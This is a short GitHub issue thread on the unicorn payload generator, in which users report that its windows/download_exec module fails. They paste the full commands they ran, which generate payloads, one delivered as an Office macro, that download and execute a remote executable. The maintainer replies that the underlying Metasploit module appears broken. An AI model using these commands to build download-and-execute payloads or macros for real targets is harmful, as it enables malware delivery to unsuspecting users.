### ISSUE TITLE
down_exec not working :(

### ISSUE THREAD

**Issue by SoniaKhan** [trustedsec/unicorn#48]
i am really thankful to you to create this powerful tool.
i request you to have a look on download execute module which is not working

command 
python unicorn.py windows/download_exec exe=test.exe url=http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

**Comment by trustedsec** [comment]
I'm pretty sure down/exec is broke in MSF currently. Doing some more digging.

**Comment by ankushgoel27** [comment]
Hi,

I am using the down/exec module and creating a macro.

python unicorn.py windows/download_exec exe=test.exe url=https://down.uploadfiles.io/get/26k20 macro

However the macro gets executed and i see an error message but the exe file is not executed
